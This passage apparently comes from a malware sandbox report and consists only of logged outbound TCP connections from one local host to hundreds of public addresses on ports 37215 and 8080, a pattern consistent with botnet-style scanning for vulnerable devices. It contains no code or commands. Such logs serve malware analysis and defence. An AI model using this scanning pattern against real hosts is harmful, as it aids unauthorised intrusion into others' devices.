    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.245.137.227:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.148.159.23:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.83.58.134:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.207.68.175:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.20.133.58:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.157.110.229:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.48.185.82:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.15.89.127:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.86.77.35:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.170.193.149:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.137.10.229:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.163.254.83:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.68.211.133:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.201.221.74:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.155.193.173:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.234.105.126:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.160.204.201:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.201.213.154:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.170.41.199:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.134.171.136:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.80.217.187:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.213.166.95:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.234.223.29:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.87.105.213:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.20.170.103:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.71.127.158:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.116.253.242:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.113.182.142:37215
    Source: global trafficTCP traffic: 192.168.2.15:8096 -> 197.122.65.5:37215
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.167.1.0:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.160.7.6:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.222.85.238:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.86.55.0:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.156.252.134:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.107.206.45:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.2.152.88:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.252.15.127:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.62.108.222:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.162.173.223:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.38.204.169:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.155.145.134:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.47.23.233:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.135.124.44:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.188.8.131:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.181.196.118:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.124.85.111:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.155.183.76:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.176.148.208:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.52.247.204:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.218.110.51:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.17.110.137:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.6.124.178:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.3.139.126:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.76.246.42:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.15.137.34:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.13.118.143:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.77.72.76:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.153.186.23:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.104.111.165:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.140.39.173:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.164.197.59:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.36.203.170:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.110.65.226:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.49.107.128:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.37.149.245:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.102.208.44:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.202.197.235:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.190.171.61:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.102.17.104:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.31.86.164:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.161.178.180:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.254.16.12:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.89.37.159:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.198.177.84:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.27.47.5:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.158.241.245:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.72.165.65:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.127.81.14:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.15.203.166:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.93.18.37:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.160.212.188:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.26.149.86:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.86.4.188:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.228.10.50:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.60.135.199:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.234.239.49:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.20.89.38:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.63.159.10:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.213.136.8:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.150.24.11:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.178.119.159:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.203.54.185:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.135.222.222:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.171.201.2:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.214.252.213:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.58.142.114:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.75.114.100:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.92.63.254:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.118.144.159:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.248.109.238:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.119.133.26:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.59.69.6:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.197.248.188:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.15.190.253:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.163.226.161:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.45.195.220:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.209.86.162:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.153.100.151:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.148.3.127:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.27.206.176:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.52.242.21:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.143.136.104:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.68.222.95:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.43.60.78:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.199.153.249:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.246.246.16:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.126.235.239:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.97.19.58:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.36.194.71:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.31.198.250:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.149.187.159:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.176.254.75:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.45.194.139:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.193.201.134:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.200.109.105:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.249.187.238:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.136.176.185:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.86.158.37:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.77.230.38:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.73.144.85:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.115.148.48:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.80.241.31:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.111.23.235:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.22.241.75:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.101.65.97:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.238.102.61:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.6.108.251:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.116.44.14:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.11.223.238:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.20.190.247:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.53.157.124:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.195.215.243:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.207.6.146:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.11.180.72:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.177.199.207:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.74.123.186:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.147.117.225:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.111.244.65:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.93.51.146:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.74.239.218:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.245.74.73:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.186.210.196:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.242.38.87:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.83.168.24:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.48.220.242:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.78.15.20:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.212.254.233:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.81.73.197:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.192.117.165:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.81.193.179:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.214.98.101:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.124.156.127:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.139.91.100:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.41.231.46:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.120.32.187:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.233.164.234:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.88.124.144:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.240.249.36:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.171.12.118:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.39.243.70:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.203.67.178:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.111.32.6:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.81.227.191:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.228.140.250:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.109.30.194:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.255.134.61:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.236.65.53:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.207.243.144:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.164.143.181:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.26.205.44:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.101.198.94:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.176.205.73:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.192.30.247:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.61.135.248:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.237.29.208:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.195.79.164:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.228.29.226:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.0.24.103:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.87.51.192:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.130.55.147:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.129.117.165:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.170.82.18:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.252.122.83:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.127.88.40:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.66.47.157:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.89.75.16:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.100.255.173:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.178.163.222:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.212.209.251:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.94.134.209:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.151.228.253:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.42.158.173:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.10.20.251:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.179.121.15:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.151.70.92:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.152.223.159:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.176.128.180:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.207.76.208:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.40.52.63:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.187.233.228:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.188.191.13:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.156.98.0:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.110.22.79:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.240.167.223:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.226.230.39:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.69.177.114:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.86.153.161:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.170.148.158:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.110.167.124:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.6.195.207:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.37.3.22:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.79.146.231:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.34.117.55:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.254.185.196:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.195.251.220:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.191.185.22:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.212.51.47:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.11.247.99:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.190.120.44:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.130.227.38:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.45.73.98:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.175.26.14:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.2.26.56:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.255.153.0:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.200.154.80:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.2.147.33:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.235.86.1:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.54.142.238:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.73.103.64:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.115.254.169:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.59.137.15:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.230.215.136:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.241.227.105:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.240.92.249:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.155.36.30:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.106.174.178:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.24.69.189:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.32.215.137:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.74.132.169:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.188.101.137:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.124.177.218:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.104.61.250:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.70.95.132:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.249.39.64:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.224.89.108:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.215.150.193:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.107.188.51:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.122.141.152:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.43.92.75:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.177.139.217:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.105.1.229:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.242.96.157:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.64.7.176:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.59.188.65:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.196.3.227:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.26.54.105:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.40.86.203:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.107.158.38:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.235.93.199:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.203.30.206:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.32.76.255:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.127.186.55:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.189.120.246:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.26.205.7:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.92.94.95:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.169.25.23:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.31.30.91:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.170.122.113:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.156.163.208:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.53.210.96:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.112.232.192:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.249.114.53:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.124.124.184:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.130.207.58:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.197.76.108:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.65.101.92:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.183.214.176:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.177.214.232:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.210.140.155:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.91.97.158:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.122.110.82:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.230.7.196:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.13.54.165:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.252.203.24:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.218.78.191:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.188.143.195:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.72.148.121:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.34.61.254:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.193.54.48:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.221.73.228:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.22.88.87:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.5.57.43:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.246.111.188:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.55.154.39:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.223.152.199:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.239.186.165:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.84.164.195:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.151.69.128:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.44.19.236:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.164.97.170:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.39.186.0:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.121.30.96:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.206.1.243:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.203.126.172:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.8.238.216:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.68.212.96:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.83.91.74:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.131.222.164:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.64.110.23:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.137.151.34:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.226.115.179:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.212.117.54:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.207.90.30:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.129.78.162:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.15.177.240:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.197.138.10:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.123.237.61:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.174.241.8:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.163.110.42:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.116.29.167:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.174.254.48:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.75.84.213:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.124.81.163:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.27.140.172:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.17.49.96:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.58.0.107:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.191.144.233:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.29.47.155:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.203.210.63:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.58.68.104:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.248.86.223:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.27.117.130:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.243.125.240:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.224.245.161:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.128.0.57:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.45.218.143:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.48.71.17:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.255.72.42:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.198.168.95:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.161.20.64:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.223.149.171:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.221.8.183:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.190.201.12:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.36.140.30:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.93.169.119:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.34.231.186:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.160.35.22:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.77.243.193:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.185.215.135:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 62.211.118.169:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.95.155.130:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.89.172.63:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.47.226.95:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.223.240.191:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 95.63.187.51:8080
